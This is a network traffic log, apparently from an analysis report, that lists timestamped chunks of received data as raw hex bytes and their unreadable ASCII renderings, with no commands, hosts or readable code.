                                                                                                                                  2022-01-11 22:39:10 UTC4166INData Raw: b4 46 10 91 22 9b f9 74 95 e4 2f 7c aa e7 52 90 52 c5 76 71 27 4a 58 75 ef 43 d3 99 5c 59 3c b1 99 9e ea 92 32 68 0c f4 d0 f2 af 57 1e fb 25 51 13 e1 30 fe bb d7 51 7c 36 5f ef 13 8f f5 67 31 bb f8 d9 42 6b ae b1 05 fe f4 78 ee 9e e8 a5 1b af 49 94 b5 a7 fc 3f 75 b7 69 46 76 cc f6 d8 48 f3 7a 98 81 7a 6c 5e 65 86 85 c3 f6 87 f6 60 94 84 e0 3d 05 45 df 1d f6 7e 9e 0b 33 5f 19 05 0d 76 32 fc 15 8e 0b ef 40 d0 b5 e9 36 22 85 cf 1b 1a 3b f3 f0 00 53 e6 4f c2 45 b5 e4 17 8b f5 bb 61 51 87 72 3b fe ee 51 d4 c2 b7 5c 94 52 10 dd bd fe b5 57 b9 b7 61 41 bc 36 4b 31 37 9e 46 27 0a 74 e3 93 3c 2f c5 4d ab 44 c4 dc 99 2f 29 81 8e 6f 8e 7f 35 91 a9 7d 22 37 e5 6b 1f cf c5 99 43 ce 8d d6 f8 82 65 18 6c 3d d6 36 42 06 37 86 26 6a 44 3b 39 af 4f 43 5d 4f 43 9a 27 03 00
                                                                                                                                  Data Ascii: F"t/|RRvq'JXuC\Y<2hW%Q0Q|6_g1BkxI?uiFvHzzl^e`=E~3_v2@6";SOEaQr;Q\RWaA6K17F't</MD/)o5}"7kCel=6B7&jD;9OC]OC'
                                                                                                                                  2022-01-11 22:39:10 UTC4182INData Raw: c2 6f 8b 5c 3f 38 03 01 2a f3 2a a2 96 76 e9 fa 00 e8 c3 6e a6 a3 e2 39 80 18 de af e4 76 8d 17 a3 59 51 7c 26 d1 d3 52 6b 33 5e 6e ff af a4 f5 46 39 fd 94 16 cc 69 d9 21 12 1c ed 6e c2 1c 87 46 4b 53 c6 ad 83 62 d7 d5 6c a7 3c fa c7 76 ee b8 e2 64 84 5a 03 d1 23 96 77 59 da 93 5a 61 62 b8 79 19 21 40 a9 a1 b6 22 d8 63 c3 6d 73 8a 83 7d fe 22 1f 00 b1 63 70 60 03 fc ae e1 5f 0b 55 9b 30 2c 86 07 8a 74 25 db 43 8f d5 ef 4a 33 99 ff 44 6d 60 3d 75 c3 b2 6d 49 bc 30 b5 3e 6b 56 77 b8 b5 cb 01 1b 83 17 aa df e1 e4 4e b1 e5 4d c9 28 eb f1 2a ef 1a 9f 67 e3 93 b3 3f 6c 16 af 37 dc fb 3a 5c cf ae 11 2b 41 53 07 fd a2 b9 21 91 80 f9 0f 61 b3 62 57 90 bf e3 0e ec c2 59 41 c0 b9 9d 2d d6 f3 75 d6 ad 20 5a 56 1c 91 5d 8f 67 1d 3e 11 01 85 9e c3 85 74 0e 8f 8f 3f 35
                                                                                                                                  Data Ascii: o\?8**vn9vYQ|&Rk3^nF9i!nFKSbl<vdZ#wYZaby!@"cms}"cp`_U0,t%CJ3Dm`=umI0>kVwNM(*g?l7:\+AS!abWYA-u ZV]g>t?5
                                                                                                                                  2022-01-11 22:39:10 UTC4198INData Raw: e4 3c 52 a0 89 e9 e8 f6 df 24 e8 22 92 44 80 61 b1 4a 63 5f 08 ec 7f fb 41 17 1c 78 70 df fc 26 71 6b 78 7e 2b bf 83 3e 0c cf d2 b7 c1 e6 b1 99 ac f5 39 58 78 2a 05 75 1f 26 5e c8 1f 0c 7f cd e2 18 bc a9 24 b9 ef 68 9e a1 f6 d8 6b 31 ba 83 8d c0 18 8f 2e c6 48 f3 74 90 b0 3e f5 b3 58 dd d7 a1 89 ab 1d ac 28 ee 2f 37 7c 78 5d c4 9e cc ec d6 ca 08 fe 65 0c cb 03 fe 37 b1 02 2c cb 43 f0 03 1d bd 35 67 e8 14 b6 d0 0e 83 db 27 3c 89 cc 52 0e 41 d1 3f 6b 0b 9b af 00 9b 07 97 86 6d 8b e3 15 85 c3 97 a3 df 68 40 be 51 0d 01 b7 05 b4 5e 72 c4 00 ed 45 be 04 ef 23 1d a5 f9 41 2e 66 98 0d e5 a6 45 29 22 48 4a ed 43 64 c6 5c 96 fd 31 88 1e 9a 7d c8 5c b5 6d 56 8e 6f c0 1d fc 15 3c a0 ba 85 24 7c 12 24 1d 69 16 52 28 fc 91 b0 15 3a 06 7e 52 06 a2 8c f9 f0 94 9d f4 b3
                                                                                                                                  Data Ascii: <R$"DaJc_Axp&qkx~+>9Xx*u&^$hk1.Ht>X(/7|x]e7,C5g'<RA?kmh@Q^rE#A.fE)"HJCd\1}\mVo<$|$iR(:~R
                                                                                                                                  2022-01-11 22:39:10 UTC4214INData Raw: c7 5d 25 31 21 9a 62 a1 c3 9f 06 22 90 1f 6c c7 4f 02 1e c0 76 b1 66 94 58 22 cb 8e 4e e2 66 dc 2b 02 b4 9e 89 93 6f ec 52 a4 1f 2d 78 73 b7 46 08 67 d6 5f 83 71 0c 38 a1 2b 88 10 a3 87 60 6a 10 67 8d 5a 18 22 75 cb 3d fd 52 e6 08 83 46 8d ac 03 61 f6 69 01 03 00 12 c2 0a ad 0f 2a 77 e6 15 13 55 4e 4e 97 04 25 e1 b6 42 f1 7a c3 20 fc aa a9 f4 47 f6 4d 92 f4 8f 9f 25 0b bd 2c 45 61 d7 13 6b d0 6a 3b 2c f4 c2 2f 26 c6 d5 57 a7 d2 bf 14 6a 50 d0 68 93 0b 7e 3e 57 16 b9 e7 b7 02 80 b4 3d 4d 7c 7b ee e5 46 70 41 3d 71 2b ca 17 97 2c 65 e0 60 88 28 7e 2d a8 a9 4f 14 76 bd 49 a1 7d 2c e8 a1 85 fb 4c cf 7e e5 b7 95 2c 50 30 b7 cd 1c 63 82 08 2a 52 0a 51 c7 be 7d 05 1d 05 f8 b9 e1 5a bc 93 3a 34 07 ba 0d 37 97 12 2a 3c 64 ea 84 13 bf cc 87 61 58 20 37 b6 78 25 29
                                                                                                                                  Data Ascii: ]%1!b"lOvfX"Nf+oR-xsFg_q8+`jgZ"u=RFai*wUNN%Bz GM%,Eakj;,/&WjPh~>W=M|{FpA=q+,e`(~-OvI},L~,P0c*RQ}Z:47*<daX 7x%)
                                                                                                                                  2022-01-11 22:39:10 UTC4230INData Raw: d7 6e b2 29 86 8f 08 5f f8 51 30 ad cd 6b 5c d6 78 9e 74 8d a1 3e e2 ab 65 9b 21 48 dc 23 3c bb 1b 17 98 c9 34 1e d1 7e eb 42 d5 e4 1d 23 a7 cc 9d 91 80 5f 7e fa b6 8c b6 29 3e b8 11 8d a9 ce 3f 0a 5e e9 bc 4d 7e be fb de d2 3b b3 35 10 42 85 82 18 fe 61 70 a7 a6 84 7a d4 11 35 00 a2 80 3b 2c e4 5d 26 8e 80 7b 2f b1 5e 5e b7 cd 14 ec a3 68 cf 60 83 e6 4a b0 96 72 da 42 3d 26 4e bb 89 11 61 c2 df 39 00 cb c3 7d d8 36 2c d9 06 58 7d 9b 79 1e 5b 69 74 86 b8 44 67 74 4c a3 f0 b6 3f 4b 43 f1 14 8d 7f a2 78 e7 40 1e 27 5a 76 81 ca 74 90 53 83 c4 e7 42 c3 51 ef a9 b1 06 3e 49 9e b1 db bd 87 c8 4a 90 79 5d 54 90 e9 36 c7 40 20 b6 0b 4b 97 8f b2 19 e5 3f 10 3f fe 31 da e0 fc e7 df 14 e1 ea 4a 46 b5 b2 f1 e7 0f 25 3d 7f 4e 06 75 34 ed b6 31 12 33 d5 68 a8 03 6c 6d
                                                                                                                                  Data Ascii: n)_Q0k\xt>e!H#<4~B#_~)>?^M~;5Bapz5;,]&{/^^h`JrB=&Na9}6,X}y[itDgtL?KCx@'ZvtSBQ>IJy]T6@ K??1JF%=Nu413hlm
                                                                                                                                  2022-01-11 22:39:10 UTC4246INData Raw: 14 a9 40 c6 a9 a5 e8 31 45 91 c8 d5 cf 12 75 b5 27 7b 4f 8d 92 d4 57 7f 92 e7 75 c0 1a 92 83 c9 76 e6 f6 89 25 fe 2b 8b c6 17 7d 9e 3b d3 93 60 ee cc 19 cf e9 ce 7e b9 a3 2e 70 3c 3e c9 76 20 66 b4 6c bf 95 9b 3b c8 75 77 74 51 b4 54 9f ba a7 22 b2 f1 6e 01 57 fd 35 b7 f6 79 ec ae 2e 0c 95 c1 a7 7e 6e d6 b9 a8 51 5d 63 93 24 8e cd 4f cc 34 ed 4f f3 89 69 80 8f fb 85 c9 7c 0d 73 4d 8c 53 f8 0e 75 a1 26 0e 66 21 f7 18 5f 8b 53 ab cf 0b c0 0f 44 a3 20 7c 31 2b e1 d7 f7 8c b4 51 89 5b 04 b6 c1 1c 84 15 04 a4 f6 7c 3b 0a 15 c0 f9 80 4f ca 52 70 eb 78 c5 77 dd 2a 36 02 dc 66 93 04 e9 96 cc 2d d2 ce e2 a9 54 e5 62 1b 76 2f d3 81 99 b3 36 8b 25 bd 0f f4 e5 c7 4f 3b d4 49 c4 15 bb 3c c2 28 b8 63 e7 7b f2 4e 27 90 3e 81 9c bb 7d 73 13 4f 1c a6 78 a1 05 40 ee 3f ae
                                                                                                                                  Data Ascii: @1Eu'{OWuv%+};`~.p<>v fl;uwtQT"nW5y.~nQ]c$O4Oi|sMSu&f!_SD |1+Q[|;ORpxw*6f-Tbv/6%O;I<(c{N'>}sOx@?
                                                                                                                                  2022-01-11 22:39:10 UTC4262INData Raw: 9b f6 70 d8 89 89 4e cc 50 31 a8 4e 0a bd bb 5b 4e d8 01 c9 ff cf 7f 21 2f 33 c6 ed ed 7e 25 17 59 6b aa 60 8b a1 b1 53 3d 40 2c 65 64 09 54 d1 82 06 14 ec b2 48 6f 03 99 80 d7 5c c4 1d 1d 87 22 ea d8 97 f1 84 48 5c 33 28 8e d4 c0 fe b6 0f 20 62 d7 81 93 44 89 c0 31 7f c9 10 eb c4 6c 77 42 ab de a2 a0 75 15 a1 63 71 99 95 e6 87 c6 60 19 66 aa b8 e5 f5 fb 11 d8 71 99 57 1a c4 0e e9 1c 87 59 be 67 06 cc 71 cd 12 c8 36 3c 73 a4 a8 77 8f da 00 30 93 d8 55 76 af 9f 17 c1 68 8e 7a 69 5e 1e 74 f4 92 01 93 1b 5f 08 0f c4 fb 63 f7 c6 45 49 23 ce cd dd 29 2d fd b4 3e 9c 73 8b 78 10 22 96 3d 52 84 0c be 21 ff f8 ba 9f 7e 7a c1 7d 8c 1c ee a1 80 cf 0d 6b 22 7e 7a 58 cd 99 dc 70 1a 49 cf 63 25 9b 28 a1 00 48 5c 75 52 82 d6 5f c4 69 f5 f2 ae e2 ac 53 e9 a5 8d 9a e1 6f
                                                                                                                                  Data Ascii: pNP1N[N!/3~%Yk`S=@,edTHo\"H\3( bD1lwBucq`fqWYgq6<sw0Uvhzi^t_cEI#)->sx"=R!~z}k"~zXpIc%(H\uR_iSo
                                                                                                                                  2022-01-11 22:39:10 UTC4278INData Raw: 31 b0 6c cd 78 a9 ab d9 ab 7d 2c e2 e1 e8 76 8a a3 fe 26 f7 1f d9 32 97 53 66 6c 72 72 78 21 9e f6 5f 34 18 e3 ec 50 56 ff 2b 24 00 84 bb 30 b0 c7 32 46 08 44 cc 10 90 15 c6 ec e4 9d 63 32 98 95 c3 04 3b d2 86 fe 97 03 3a 20 41 cb d6 d3 81 c0 4f bf c3 00 85 43 44 90 8f d2 d6 ae 94 79 42 af f7 fd ad 79 d3 44 6d 91 ca 8b ca 1e a0 2d 9a 37 68 68 10 cd 7c 07 b8 52 da 77 7b 9d a4 29 cb 09 b3 0d 71 90 23 85 a9 07 b6 ca dd 6b 47 3d b3 76 5a f4 a9 61 e2 66 cf fe 75 91 04 f3 fe 33 3c fb ee 1c ec 23 f6 b4 e2 44 4e 65 eb a2 80 ba 55 68 42 7c 20 92 0b ed 1b eb 34 07 3a 1b c9 57 c2 e7 9e 3a 19 fe 55 60 8e b4 b7 8c 7a 52 92 37 a1 51 c4 73 c5 36 f5 2e 80 8d 00 10 3e 5d 3d 27 38 dc 00 69 6c 74 87 e4 fb 2a f6 8f 75 43 ca 84 c0 96 88 d0 d3 93 77 5b 61 d7 b2 93 c5 ce 56 1c
                                                                                                                                  Data Ascii: 1lx},v&2Sflrrx!_4PV+$02FDc2;: AOCDyByDm-7hh|Rw{)q#kG=vZafu3<#DNeUhB| 4:W:U`zR7Qs6.>]='8ilt*uCw[aV
                                                                                                                                  2022-01-11 22:39:10 UTC4294INData Raw: 71 df bd fb 04 c0 47 7e fc de c5 7e 90 04 fb 5f 1b 2b 5a 71 a9 66 3b c0 79 33 6c ac ff fb c6 f0 81 c9 f5 f4 34 1a 78 02 33 a6 54 3f 7e 80 a4 8f 6f d6 7a 22 ab 22 6a bd 73 9f 9b 2a 06 5c 52 3c ee 7c 63 ab 7f 2d 6a 6f 24 96 1a 2e 82 48 f0 40 21 27 87 31 e4 bb 4f e2 e0 39 87 7a aa 70 e3 1c 05 c9 51 09 06 3c 80 18 19 97 09 b9 0a 66 ea d4 44 ab c8 1f fb 50 cf 81 92 4d e8 7e 25 59 9f 77 29 1a 99 37 17 8a c3 19 ad 65 d3 b5 fa 46 71 0d 08 90 48 31 7c ac cd 18 0a c5 8b 16 6e 5e 92 a9 6c 7d fa 92 d2 2e 6c 86 61 4e 82 45 0c 73 eb 86 6a 37 fa b2 57 05 52 74 06 32 92 52 e6 a9 97 49 d8 2a 44 38 08 e1 85 33 b8 94 e4 3c 71 32 01 1c 61 9d 8b a9 68 c3 3d 12 81 8d 3f 25 6e da e7 7f fe b1 bd 16 50 4d cc 46 c2 e6 48 67 5e f2 1b 56 81 63 e1 25 4c a1 82 60 68 89 8c cd 73 8b 0d
                                                                                                                                  Data Ascii: qG~~_+Zqf;y3l4x3T?~oz""js*\R<|c-jo$.H@!'1O9zpQ<fDPM~%Yw)7eFqH1|n^l}.laNEsj7WRt2RI*D83<q2ah=?%nPMFHg^Vc%L`hs
                                                                                                                                  2022-01-11 22:39:10 UTC4310INData Raw: 13 25 f5 0f 90 06 3a b0 92 7a af 35 dd 66 99 60 07 0a 91 62 7b 08 4b 4e 17 93 78 0a 36 5b 6b df be 06 0c ac 67 e9 ec 57 87 6c 54 2c 48 37 46 72 40 c5 d3 8a ba 6f 84 81 08 82 47 4d ad 3e 9f be 6d c9 62 b5 52 25 09 03 ed af 52 98 53 0a df c6 24 eb 6a 7b 93 cd b2 3f 92 3d 31 d2 b9 89 f9 8a a7 a4 d5 1b 30 b1 e4 95 10 f1 4c 21 2c 38 71 7b 7e 38 3e b6 2b af 5f 1c aa b5 07 bb 75 bb 96 8c 5a 0e d2 12 85 6a 56 ec d5 fc 5e 8b ea bf f4 4f 28 9b 16 76 eb 79 13 62 e7 4d c5 61 e2 6b e8 0d 41 6b 38 52 76 f8 92 07 ed fd 8c 87 4e e8 fa 08 46 cf 98 cb 9c 03 63 a2 e0 4a 22 25 1b e1 26 ab 27 75 7c 08 ff 1b e7 71 a2 28 f0 af 93 19 17 af e0 ea 25 1f f7 5e ce 3c 36 2f 64 ff ca 8d 23 ec f3 4f 67 68 a1 5e ba 62 c2 ac 8d 9d b8 75 19 26 bf 65 94 46 9a 08 3d 0c 74 60 76 bf 22 c7 8f
                                                                                                                                  Data Ascii: %:z5f`b{KNx6[kgWlT,H7Fr@oGM>mbR%RS$j{?=10L!,8q{~8>+_uZjV^O(vybMakAk8RvNFcJ"%&'u|q(%^<6/d#Ogh^bu&eF=t`v"
                                                                                                                                  2022-01-11 22:39:10 UTC4326INData Raw: a9 01 4a 3d b8 85 d1 91 c4 19 1d 0b 1f a6 1d e3 e6 19 e6 9b cf c9 ad ce d3 de 06 8c 10 d9 77 62 cf 42 8e ad ba b9 cc f7 f5 70 fb 0a 9c 48 89 16 ce 73 15 fc a4 12 f0 14 7d fe dc 9d 74 52 32 c8 26 1a 56 f7 dd d0 f3 70 de c8 9d 9b d4 0a 66 55 65 73 c5 b3 97 a3 3a 28 82 5a 30 72 3c 00 3f 7a 6c 56 bb 31 e5 6d cc ac 9e 23 f7 15 b9 a9 88 a2 db 96 15 a2 a0 c0 81 69 8c 85 f8 bc bd 41 e7 eb b8 12 04 ae d2 cc b1 57 9c 99 d9 5a b6 93 36 38 ec 12 6b b4 af ee 80 a7 ff 4a 7e 59 de 07 c1 ae 7e b7 60 5f f2 27 48 4e f8 0f 0d 2a 27 e6 75 57 68 ea b4 f9 33 0a 34 40 ab 8b 2f 33 38 fc ba bf d0 18 61 97 c2 75 37 a5 e1 c6 6a 1d d0 74 50 15 f9 fa 12 81 6d 4a c9 22 76 47 ad ed ee a1 0e 4c c8 99 d1 8e 4e ba 0c 6a 80 44 9c ac 57 53 ce 28 72 59 08 fd a4 d0 98 17 84 54 c2 43 89 a6 35
                                                                                                                                  Data Ascii: J=wbBpHs}tR2&VpfUes:(Z0r<?zlV1m#iAWZ68kJ~Y~`_'HN*'uWh34@/38au7jtPmJ"vGLNjDWS(rYTC5
                                                                                                                                  2022-01-11 22:39:10 UTC4342INData Raw: 5a 7d a3 f4 25 7a f1 ce b9 b6 28 06 9c df 97 41 0a eb ad 4c cd 47 87 8c c3 d7 51 0f 8b dd 8a 6c a5 9d ee 66 ed 71 03 3b 35 59 b0 fe 5d 68 35 c6 17 d3 18 9b 6f 15 88 3c 29 d0 53 f1 70 5c c5 a6 f6 24 56 85 56 88 b0 f3 b6 5e f3 47 17 7f ee 8d a9 ad 0f f5 4b 5c 20 a0 28 0f c6 30 60 68 29 3f c8 72 a8 b8 25 db 9d 85 e9 f9 34 00 98 98 c8 dc e3 77 ae 1c 20 c8 19 15 6c dc 4d 0d 5b 8b 2b 00 29 a0 15 7c 4b 3d a4 63 4c b9 1d e8 b1 59 cf 83 1d 60 16 52 ca 7c 23 6a 31 56 8f 56 5b a1 5b 7a 13 60 a0 46 9f ce ad 90 7b cc 96 d6 74 5f ba 12 3f 18 e2 51 d9 ba 22 0c b2 71 53 64 67 32 63 cb 05 5e be 7e 59 cd 13 cb 2b 15 e9 28 0b d8 a1 31 df cb 21 98 65 38 ca 3b 16 57 e9 fa b6 c2 ee 85 15 b2 ef a5 94 a0 80 14 5f b6 71 94 52 34 3a 07 12 37 1c 0a a0 46 9c 90 f6 45 c5 4e d5 e6 87
                                                                                                                                  Data Ascii: Z}%z(ALGQlfq;5Y]h5o<)Sp\$VV^GK\ (0`h)?r%4w lM[+)|K=cLY`R|#j1VV[[z`F{t_?Q"qSdg2c^~Y+(1!e8;W_qR4:7FEN
                                                                                                                                  2022-01-11 22:39:10 UTC4358INData Raw: f5 85 42 7c 3f 24 ae 5f 6e 7e 06 11 0c d0 b9 65 98 6c 54 af 96 10 7d b0 8d 14 05 c2 54 2a 77 89 a2 e4 a4 15 61 6f 43 b2 b0 df b2 d7 5a a2 60 e5 20 07 01 22 af a8 b3 0b c2 49 1b f1 bb 67 0b c3 40 2d 94 1a 1d 18 3c 47 47 bc 08 d1 e4 ec f8 ea 8e af 64 50 2a 04 2a f8 bb ce ab f5 97 61 16 a7 75 e6 c3 74 42 13 5d 68 98 a8 d6 25 b4 3b 69 af 3e 3b f1 72 4e f2 29 05 d8 15 ea a4 4e f9 04 e7 f6 28 90 25 df 5d b6 9c 6c 20 72 ac ac cb 77 d1 bb 76 cb 5f da 18 d2 ea 0d 33 52 e9 0d 51 9a d1 9b 8b ea db 7c d1 f6 ee d1 75 fd 86 c2 60 52 e7 90 3e aa 49 fc 8e 19 37 8a 70 6f 35 6e 48 b2 93 ab c8 2b 8f 47 f7 59 99 bc dd c8 96 e3 15 c5 bf 79 9c 86 69 f9 ff 50 04 29 3a dc f8 fd f1 42 89 5c 3e c6 58 d9 56 cb 14 b6 a1 8b 33 44 3f fd ee 28 52 76 6a b6 1a 75 0f bd 5f fa 1c de fa 08
                                                                                                                                  Data Ascii: B|?$_n~elT}T*waoCZ` "Ig@-<GGdP**autB]h%;i>;rN)N(%]l rwv_3RQ|u`R>I7po5nH+GYyiP):B\>XV3D?(Rvju_
                                                                                                                                  2022-01-11 22:39:10 UTC4374INData Raw: b6 ed ef 63 9f 9e f9 18 c3 a0 59 e4 eb a0 73 58 54 4a 5e a4 80 59 e9 20 d6 8f 42 1a 3e af 94 4a 59 93 78 2f 71 fc 7e 46 b4 27 90 3c 70 fe 4d 17 94 be cd a4 b1 7b 42 6b 91 9b a3 51 1e 92 b2 70 b3 02 1b 66 53 d2 62 16 09 61 7f 22 9f 6d f6 5e 89 c4 57 5e 6a 8b 2b 45 ac 45 06 d3 93 75 54 3a 17 52 bf 9c c3 d9 0e 66 13 e7 b1 a2 67 53 62 f7 1f a5 00 c4 38 e8 a9 55 37 99 85 39 7a 76 ad 47 da e7 1c 90 75 3b c6 76 65 06 74 04 23 07 dd 4f ed be 97 01 9d 3a 8e f1 1d 20 d7 5f ab 23 29 39 0e 6f 61 2b 36 d3 ab cb 59 c3 22 d6 27 59 df a0 a8 04 e4 f7 fe 42 04 f4 f9 bb 45 a1 77 da b4 c0 d3 5f df c7 8b c9 6a 4c ad ee 73 1e 0b 92 ee be d1 c3 76 1c cf 07 64 1a 91 f6 d0 70 c9 a0 f1 c7 f6 e5 51 79 48 73 d9 bc 41 e7 15 70 c4 02 f9 cf 00 c9 a9 1a ec 59 f1 c5 af 10 41 0f 17 4a ca
                                                                                                                                  Data Ascii: cYsXTJ^Y B>JYx/q~F'<pM{BkQpfSba"m^W^j+EEuT:RfgSb8U79zvGu;vet#O: _#)9oa+6Y"'YBEw_jLsvdpQyHsApYAJ
                                                                                                                                  2022-01-11 22:39:10 UTC4390INData Raw: b7 ef ae 85 06 ec 68 93 dd 16 9d f3 ea 96 1d fe 90 9a 51 6f 1e 33 44 d3 aa 04 e5 b9 e6 ae 86 bf 05 e3 cf e3 45 eb 26 a3 d1 a8 42 40 c2 e3 a3 f9 bb 4f 4c 39 50 05 93 70 b8 6f 73 1c 68 43 c4 bb 8b d1 9a e2 62 d9 c2 5c ea bf 93 ff e0 a8 e1 e4 2d 88 ee 1e 51 84 6e 79 bb 7a 34 ce 8a 91 75 44 cc a2 6b 6b 88 98 81 98 be 31 d2 ba 0f 39 c6 2a fe 4a 22 a7 95 4a 20 04 20 0a 73 61 22 91 ec c4 29 b0 d7 e0 95 ea 32 c3 53 3b 03 04 d0 cd 25 7d 83 c8 67 23 47 43 de 34 39 80 54 eb 0a 40 ae 77 da ac 98 64 05 9c 18 b3 79 13 d3 cf 50 34 f2 2d 69 0a 4a e1 2a 20 47 91 57 ec 86 8a dd 9d 41 a1 f1 d2 15 9f d3 90 8a 94 39 90 b9 71 71 5f f9 d2 9b 6f 08 34 a5 9d ad 02 c5 ff 45 4a 98 98 ca 00 98 45 9e bc 61 c1 cf 68 aa c5 a9 a9 c6 f3 a9 10 15 df 26 32 b2 42 30 3b 05 49 6a 71 00 38 18
                                                                                                                                  Data Ascii: hQo3DE&B@OL9PposhCb\-Qnyz4uDkk19*J"J sa")2S;%}g#GC49T@wdyP4-iJ* GWA9qq_o4EJEah&2B0;Ijq8
                                                                                                                                  2022-01-11 22:39:10 UTC4406INData Raw: 2f 91 84 14 4d 39 3b 47 19 f3 f6 46 4d 60 39 e0 c6 ae fd db fd 97 a1 95 4a 24 11 43 6f 63 0b a1 c4 2d 6e d5 df 3d 81 79 35 8f b2 de d2 2b e7 d0 fe 79 f6 fd f3 3a 58 0d 78 61 3e eb 50 54 65 36 8e b3 ca 74 c9 9b 6c ee 63 d6 d3 6b 4f ab be 0c 0b 1c 52 ad 3b 38 d9 5a 7e d1 f4 5e 08 61 1d fd 1d 4f 48 86 16 f2 71 3f fb 1d f1 06 d7 5e 6c 4d 44 ae 2a d5 92 27 4a d1 7c 43 35 b9 8f 6a db 9c 45 18 6b 39 98 c7 55 b6 31 9a d8 db 03 dd c8 22 b2 43 68 a0 3f 51 dc 95 9f 20 33 4a 8f 52 51 34 d0 c8 2f 97 30 77 35 6a 8c 40 af 47 58 62 b7 02 e4 1c 17 36 93 23 8a 50 0d 8c 97 a7 86 64 d7 04 66 91 b7 5f 46 a8 ab 2f 61 2a 02 53 44 94 fb ed cb ae be b4 57 9e b6 98 80 02 33 37 9f ba fc 07 b7 f6 cf b6 0e 88 c8 5d 51 86 e8 36 03 dc 27 e9 b7 76 35 d1 c2 0f 55 fb 00 4e 41 d2 35 ed 7d
                                                                                                                                  Data Ascii: /M9;GFM`9J$Coc-n=y5+y:Xxa>PTe6tlckOR;8Z~^aOHq?^lMD*'J|C5jEk9U1"Ch?Q 3JRQ4/0w5j@GXb6#Pdf_F/a*SDW37]Q6'v5UNA5}
                                                                                                                                  2022-01-11 22:39:10 UTC4422INData Raw: 76 46 f6 03 58 68 3b 10 cc 91 bd ad 86 4f 8e df bb c2 eb c9 82 d9 86 16 fe 85 78 15 70 f9 49 b8 bd 3a 24 ad ac f7 14 10 ec 49 54 a3 18 38 27 c6 f8 93 03 dc fa 7b 5f 91 cc bc 30 94 ba f5 c8 79 d5 e8 f7 5a c0 c6 e6 a0 b3 f3 2d dc 66 2b a3 9e 63 11 31 cd d8 b9 eb 9c a1 49 5f ff 90 f8 08 bc 7c fd 40 f1 83 c8 98 b4 83 7c 0d 24 09 47 df 02 83 2b ee ac 60 12 62 96 b1 36 b8 99 0f d0 b2 33 e7 a8 be 3c a4 df 23 32 6b 11 f9 69 1f b0 e3 88 bc 67 ac c8 4f 0f bc 8b 53 ca 34 ef f2 fe 4b 6a 36 fe cf ee 37 26 48 86 1e 46 eb 3e bc ed f8 0d 35 b6 64 84 8c 34 ad ce ac 04 3c 6e 6e 8d ee f9 6a 29 9d 82 d8 c8 00 ce e6 26 e6 e6 fd 33 b9 c7 9a a5 72 71 e2 0d 98 64 eb 33 a5 0e 54 43 02 8f df 59 c9 6f c9 b9 9f 7b cb 7c 58 77 dc a7 ef 89 a6 f5 eb 05 65 64 86 90 32 c7 32 a0 69 da 7d
                                                                                                                                  Data Ascii: vFXh;OxpI:$IT8'{_0yZ-f+c1I_|@|$G+`b63<#2kigOS4Kj67&HF>5d4<nnj)&3rqd3TCYo{|Xwed22i}
                                                                                                                                  2022-01-11 22:39:10 UTC4438INData Raw: 27 f4 f8 fa ac f9 72 8f 97 b4 8b 80 4a 42 aa dd aa 78 be 83 cd cb 6e 37 38 d3 a8 64 cf d5 1a 37 d1 ec c4 2c a2 b7 a3 37 13 95 98 0f 5b f1 ae fa 85 4b 85 41 6f 44 5f 88 9b 3c 86 69 9a 7b 76 c9 6f 7e fc 16 c6 10 78 fe e6 73 ce 16 a6 6c d2 55 92 f0 e0 ba 87 ca 89 89 3f 20 32 5a 20 39 94 c1 85 eb 83 a9 7d b6 6d 84 59 e6 bb fc 49 e3 b8 2b 4f af d2 ba 6a 54 c8 df b1 d8 1f 7d 64 e1 9d b4 d9 0e be a5 14 db d5 da e1 1c f4 b7 57 66 2d 13 d6 c3 33 f8 e4 ca 72 ec a0 96 9f 80 d7 40 8d a0 24 4e 6d f4 a6 da a8 a5 17 69 77 e2 dc 93 6b 61 44 23 c5 93 12 d3 65 a4 4f b6 b5 0b 89 c8 4b ac 1c 52 98 4b 5e f3 10 ca ea 86 9f 0b 60 57 48 81 d3 92 c6 bf c3 fa e6 7a 8e f6 c9 ab 96 7e 57 83 c9 84 04 cc 03 47 50 f8 1e 20 f0 c8 c8 4e b5 c3 c1 75 b6 51 1e 56 1e c3 bd 28 6b c9 57 2b 29
                                                                                                                                  Data Ascii: 'rJBxn78d7,7[KAoD_<i{vo~xslU? 2Z 9}mYI+OjT}dWf-3r@$NmiwkaD#eOKRK^`WHz~WGP NuQV(kW+)
                                                                                                                                  2022-01-11 22:39:10 UTC4454INData Raw: 62 73 bf 67 c9 0f cc 09 3b 72 5d d2 72 61 04 05 5f 96 52 38 ac 09 92 1c d6 52 5b cb be 85 b7 e3 49 be cf c8 e3 cd c4 ea bc f1 11 83 31 a1 77 fa 01 e4 30 5d 78 94 72 7e de 88 d7 7a 45 13 a6 38 53 76 72 0d ef dd 0e e1 bc 86 ec c7 cc 0f eb 05 62 9e a3 93 1f 08 e6 7a 70 69 90 c2 6a 59 09 69 d2 25 d0 b2 b3 cb 82 07 9f 9a 92 f5 89 62 ef d8 82 fd 02 67 84 82 80 93 78 30 a7 59 ad b0 e5 c7 fc 8b 49 7f d1 87 cc 9a 0b 0c 75 64 03 99 81 9e 1d 65 62 3e e6 c9 85 c2 f2 b8 d8 64 8a c5 28 53 2e 7a 22 9e 54 12 b2 9f 27 7c d0 21 0d 5d b4 03 9e 13 38 04 de 36 52 0e 83 ec 0b 3e c3 e1 34 3d 17 46 b0 19 23 8f aa f8 90 2f 8d cc 1c 09 44 30 bd b1 fa 17 9e 72 4a dd 01 28 eb ce 5d e7 e4 80 f7 34 80 d5 0f 3a b7 5b 1f a2 3b ec dc c4 38 03 33 01 97 93 3e e2 c6 15 89 87 71 e3 2b 31 d3
                                                                                                                                  Data Ascii: bsg;r]ra_R8R[I1w0]xr~zE8SvrbzpijYi%bgx0YIudeb>d(S.z"T'|!]86R>4=F#/D0rJ(]4:[;83>q+1
